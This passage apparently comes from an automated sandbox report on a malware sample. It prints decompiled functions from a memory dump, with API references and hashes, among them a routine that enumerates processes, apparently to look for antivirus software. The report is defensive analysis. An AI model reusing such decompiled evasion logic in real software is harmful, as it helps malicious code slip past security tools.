						HeapFree( *0xcfd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E00CF94FB();
					if(_t19 != 0) {
						_t22 =  *0xcfd338; // 0x3179b48
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x00cf340a
0x00cf340e
0x00cf340f
0x00cf3410
0x00cf3415
0x00cf341a
0x00cf3421
0x00cf3428
0x00000000
0x00000000
0x00cf342a
0x00cf342f
0x00cf3430
0x00cf3437
0x00cf3451
0x00000000
0x00cf3439
0x00cf3439
0x00cf343b
0x00cf343e
0x00cf3442
0x00000000
0x00000000
0x00cf3444
0x00cf3442
0x00cf3459
0x00cf3459
0x00cf345b
0x00cf3462
0x00cf3464
0x00cf346a
0x00cf3471
0x00cf3481
0x00cf3479
0x00cf347c
0x00cf347c
0x00cf3484
0x00cf3484
0x00cf348d
0x00cf348d
0x00cf3457
0x00000000

APIs

Part of subcall function 00CF94FB: GetProcAddress.KERNEL32(36776F57,00CF341A), ref: 00CF9516

Part of subcall function 00CF523C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00CF5267
Part of subcall function 00CF523C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00CF5289
Part of subcall function 00CF523C: memset.NTDLL ref: 00CF52A3
Part of subcall function 00CF523C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00CF52E1
Part of subcall function 00CF523C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00CF52F5
Part of subcall function 00CF523C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CF530C
Part of subcall function 00CF523C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00CF5318
Part of subcall function 00CF523C: lstrcat.KERNEL32(?,642E2A5C), ref: 00CF5359
Part of subcall function 00CF523C: FindFirstFileA.KERNELBASE(?,?), ref: 00CF536F

Part of subcall function 00CF978C: lstrlen.KERNEL32(?,00000000,00CFD330,00000001,00CF3435,00CFD00C,00CFD00C,00000000,00000005,00000000,00000000,?,?,?,00CF568F,00CF5073), ref: 00CF9795
Part of subcall function 00CF978C: mbstowcs.NTDLL ref: 00CF97BC
Part of subcall function 00CF978C: memset.NTDLL ref: 00CF97CE

HeapFree.KERNEL32(00000000,00CFD00C,00CFD00C,00CFD00C,00000000,00000005,00000000,00000000,?,?,?,00CF568F,00CF5073,00CFD00C,?,00CF5073), ref: 00CF3451

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 983081259-0
Opcode ID: 0c919c1c69f0b29b033cae1fcb024c00815bc17cca6168ccd7ec7782b88381ed
Instruction ID: 0dbb40f5317f608d745473a175a49ad88d32a835f4c5ccaea2e130cc509bf490
Opcode Fuzzy Hash: 0c919c1c69f0b29b033cae1fcb024c00815bc17cca6168ccd7ec7782b88381ed
Instruction Fuzzy Hash: D5012D7560028CBADB515FE6CC81B7D7E95DB45354F60003ABF45C6050C6708E42E667

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2AFE, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF2AFE(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E00CF5974(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E00CF63A4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0xcfd238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}

0x00cf2b06
0x00cf2b5d
0x00cf2b62
0x00cf2b08
0x00cf2b22
0x00cf2b26
0x00cf2b2b
0x00cf2b2d
0x00cf2b3f
0x00cf2b4b
0x00cf2b2f
0x00cf2b2f
0x00cf2b34
0x00cf2b39
0x00cf2b39
0x00cf2b2d
0x00cf2b26
0x00cf2b68

APIs

HeapFree.KERNEL32(00000000,?,00000000,80000002,74B5F710,?,?,74B5F710,00000000,?,00CF5CC9,?,004F0053,03179378,00000000,?), ref: 00CF2B4B

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 530f384bfb1c10940c7128f5683d6ccd73126531c60d9cf4e487f29eb4f858fb
Instruction ID: e7291b1f8c2e0ce905022736695c8cb657590cacc56d472a611ef9e328335f78
Opcode Fuzzy Hash: 530f384bfb1c10940c7128f5683d6ccd73126531c60d9cf4e487f29eb4f858fb
Instruction Fuzzy Hash: 29014B3210064DEBCF66DF94CC01FBA3BB5AF04750F158118FF1A9A160D7318A20EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00CF3651, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CF3651(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00cf3651
0x00cf365e
0x00cf365f
0x00cf3660
0x00cf3667
0x00cf3695
0x00cf3696
0x00cf3699
0x00cf369f
0x00000000
0x00000000
0x00cf367e
0x00cf3688
0x00cf368f
0x00000000
0x00cf3680
0x00cf3683
0x00cf36a3
0x00cf3685
0x00cf3685
0x00000000
0x00cf3685
0x00cf3683
0x00cf36aa
0x00cf36b0
0x00cf36b0
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00CF3699

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 69391b80874d21d65c54d8e88990d2df2f92fd81ea6f6b2ddbbeee9db5b59729
Instruction ID: 85b62bd35726487f965d785e094878376731bd39db0826591abb272a2cc1a93d
Opcode Fuzzy Hash: 69391b80874d21d65c54d8e88990d2df2f92fd81ea6f6b2ddbbeee9db5b59729
Instruction Fuzzy Hash: 60F0C475D01258FBDB04DB95C988AFDB7B8FF08304F1080AAE612A7240D7B46B84DF56

Uniqueness

Uniqueness Score: -1.00%

Function 00CF315A, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF315A(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E00CF69C1(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E00CF677C(_a4);
				}
				return _t13;
			}

0x00cf3166
0x00cf316b
0x00cf316f
0x00cf3176
0x00cf3181
0x00cf3185
0x00cf3185
0x00cf318e

APIs

Part of subcall function 00CF69C1: memcpy.NTDLL(00000000,00000090,00000002,00000002,00CF28D0,00000008,00CF28D0,00CF28D0,?,00CF94B3,00CF28D0), ref: 00CF69F7
Part of subcall function 00CF69C1: memset.NTDLL ref: 00CF6A6C
Part of subcall function 00CF69C1: memset.NTDLL ref: 00CF6A80

memcpy.NTDLL(00000002,00CF28D0,00000000,00000002,00CF28D0,00CF28D0,00CF28D0,?,00CF94B3,00CF28D0,?,00CF28D0,00000002,?,?,00CF50A1), ref: 00CF3176

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 19ede30670193b995c5d5db20b1a4b6792fa3a521838883ea8051f015e3fd0f2
Instruction ID: 4a1605442795401366d91561f5e30c521358d21a23fac263db649815081121c6
Opcode Fuzzy Hash: 19ede30670193b995c5d5db20b1a4b6792fa3a521838883ea8051f015e3fd0f2
Instruction Fuzzy Hash: 7FE08C3640112D7BCB522A94DC01EFFBF6CDF597A1F004025FF088A211DA32CA50A7E6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CF244A, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CF244A() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xcfd2a4; // 0x247a5a8
						_t2 = _t9 + 0xcfee48; // 0x73617661
						_push( &_v264);
						if( *0xcfd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00cf2455
0x00cf245f
0x00cf2463
0x00cf246d
0x00cf249e
0x00cf2474
0x00cf2479
0x00cf2486
0x00cf248f
0x00cf24a6
0x00cf2491
0x00cf2499
0x00000000
0x00cf2499
0x00cf24a7
0x00cf24a8
0x00000000
0x00cf24a8
0x00000000
0x00cf24a2
0x00cf24ae
0x00cf24b3

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CF245A
Process32First.KERNEL32(00000000,?), ref: 00CF246D
Process32Next.KERNEL32(00000000,?), ref: 00CF2499
CloseHandle.KERNEL32(00000000), ref: 00CF24A8

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 25e2e92543345d161945df8f51e1bbdce6c7bbd23aaf87492235abb57a2a7132
Instruction ID: 336406dc302a1da75f7eecf7e2a6562893612c4fb4607699f9b01034f89d0ec9
Opcode Fuzzy Hash: 25e2e92543345d161945df8f51e1bbdce6c7bbd23aaf87492235abb57a2a7132
Instruction Fuzzy Hash: 9EF0963220011CABD760AA769D49EFF7B6CEBC5710F000161FB59D2001EA64CA468AAB

Uniqueness

Uniqueness Score: -1.00%

Function 10001799, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001799() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x1000412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10004128 = _t5;
						 *0x10004130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10004124 = _t6;
						if(_t6 == 0) {
							 *0x10004124 =  *0x10004124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x1000179a
0x100017a8
0x100017ae
0x100017b5
0x1000180c
0x1000180c
0x100017b7
0x100017bf
0x100017cc
0x100017cc
0x10001808
0x1000180a
0x00000000
0x00000000
0x00000000
0x100017c1
0x100017c8
0x100017ce
0x100017ce
0x100017d3
0x100017e1
0x100017e6
0x100017ec
0x100017f2
0x100017f9
0x100017fb
0x100017fb
0x10001805
0x100017ca
0x100017ca
0x00000000
0x100017ca
0x100017c8

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,100019D3), ref: 100017A8
GetVersion.KERNEL32(?,100019D3), ref: 100017B7
GetCurrentProcessId.KERNEL32(?,100019D3), ref: 100017D3
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,100019D3), ref: 100017EC

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: be86b185e164205b92613c215166423dbb3ce5b8bef7792cf5731e59b1f85228
Instruction ID: 476726ea2d1ce052e5984cf8ea575588ff25578c4e3a38b3fd47c6afe3a87b53
Opcode Fuzzy Hash: be86b185e164205b92613c215166423dbb3ce5b8bef7792cf5731e59b1f85228
Instruction Fuzzy Hash: 81F0AFB06453319BF7429F68AD9A7C53BE4E7097D3F128119E641C61ECEBB089918B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00CF99FC, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00CF99FC(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x00cf99ff
0x00cf9a0a
0x00cf9a0d
0x00cf9a10
0x00cf9a11
0x00cf9a2f
0x00cf9a31
0x00cf9a34
0x00cf9a37
0x00cf9a37
0x00cf9a3a
0x00cf9a3a
0x00cf9a3d
0x00cf9a3d
0x00cf9a40
0x00cf9a40
0x00cf9a5d
0x00cf9a60
0x00cf9a76
0x00cf9a79
0x00cf9a93
0x00cf9a96
0x00cf9aac
0x00cf9aaf
0x00cf9ab1
0x00cf9ac9
0x00cf9acc
0x00cf9acf
0x00cf9ae7
0x00cf9aea
0x00cf9b04
0x00cf9b07
0x00cf9b1d
0x00cf9b20
0x00cf9b22
0x00cf9b3a
0x00cf9b3f
0x00cf9b42
0x00cf9b58
0x00cf9b5b
0x00cf9b75
0x00cf9b78
0x00cf9b8e
0x00cf9b91
0x00cf9b93
0x00cf9bae
0x00cf9bb1
0x00cf9bc8
0x00cf9bcb
0x00cf9bcf
0x00cf9be8
0x00cf9beb
0x00cf9bed
0x00cf9bf0
0x00cf9c0b
0x00cf9c0e
0x00cf9c27
0x00cf9c2a
0x00cf9c3a
0x00cf9c3d
0x00cf9c55
0x00cf9c58
0x00cf9c72
0x00cf9c75
0x00cf9c8d
0x00cf9c90
0x00cf9ca6
0x00cf9ca9
0x00cf9cc1
0x00cf9cc4
0x00cf9cdc
0x00cf9cdf
0x00cf9cf9
0x00cf9cfc
0x00cf9d12
0x00cf9d15
0x00cf9d2d
0x00cf9d30
0x00cf9d4a
0x00cf9d4d
0x00cf9d65
0x00cf9d68
0x00cf9d7e
0x00cf9d81
0x00cf9d99
0x00cf9d9c
0x00cf9db4
0x00cf9db7
0x00cf9dc9
0x00cf9dcc
0x00cf9dde
0x00cf9de1
0x00cf9df3
0x00cf9df6
0x00cf9dfa
0x00cf9e0a
0x00cf9e0d
0x00cf9e1b
0x00cf9e1e
0x00cf9e30
0x00cf9e33
0x00cf9e47
0x00cf9e4a
0x00cf9e4c
0x00cf9e5c
0x00cf9e5f
0x00cf9e71
0x00cf9e74
0x00cf9e82
0x00cf9e85
0x00cf9e97
0x00cf9e9a
